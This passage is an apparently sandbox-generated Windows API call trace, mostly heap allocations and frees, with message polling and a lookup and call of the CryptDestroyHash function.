hHeap=0x970000) returned 1 [0129.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0129.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0129.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0129.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0129.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0129.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0129.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0129.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0129.040] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0129.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0129.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0129.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0129.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0129.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0129.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0129.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0129.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0129.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0129.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0129.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0129.041] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0129.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0129.041] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0129.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0129.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0129.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0129.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0129.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0129.041] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0129.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0129.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0129.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0129.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0129.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0129.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0129.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0129.041] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0129.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0129.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0129.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0129.042] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0129.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0129.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0129.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0129.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0129.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0129.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0129.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0129.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0129.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0129.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0129.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0129.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0129.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0129.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0129.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0129.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0129.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0129.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0129.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0129.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0129.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0129.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0129.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0129.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0129.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0129.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0129.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c98 [0129.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509e0 [0129.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0129.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a28 [0129.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c20 [0129.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0129.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0129.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0129.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0129.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0129.043] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0129.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0129.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0129.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a70 [0129.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0129.043] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0129.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0129.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0129.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0129.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0129.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0129.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0129.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0129.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0129.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0129.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0129.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0129.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0129.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0129.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0129.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0129.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0129.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0129.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0129.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0129.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0129.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0129.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0129.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0129.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0129.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0129.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0129.045] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0129.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0129.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0129.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0129.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0129.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0129.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0129.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0129.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0129.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0129.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0129.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0129.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0129.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0129.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0129.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0129.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0129.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0129.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0129.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0129.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0129.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0129.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69b28 [0129.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69b28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0129.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0129.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0129.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0129.046] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0129.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0129.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0129.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0129.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0129.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0129.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0129.046] CryptDestroyHash (hHash=0xa87110) returned 1 [0129.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0129.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0129.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0129.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0129.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0129.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0129.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0129.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0129.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0129.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0129.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0129.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0129.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0129.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0129.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0129.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0129.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0129.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0129.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0129.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0129.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0129.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0129.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0129.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0129.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0129.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0129.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0129.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0129.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0129.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0129.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0129.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0129.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0129.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0129.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0129.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0129.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0129.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0129.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0129.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0129.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0129.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0129.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0129.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0129.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0129.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0129.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0129.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0129.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0129.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0129.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0129.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0129.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0129.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0129.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0129.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0129.049] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0129.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0129.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0129.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0129.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0129.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0129.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0129.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0129.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0129.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0129.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0129.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0129.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0129.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0129.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0129.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0129.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0129.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0129.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0129.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0129.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0129.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0129.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0129.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0129.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0129.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0129.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0129.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0129.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0129.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0129.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0129.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0129.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0129.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0129.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0129.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0129.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0129.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 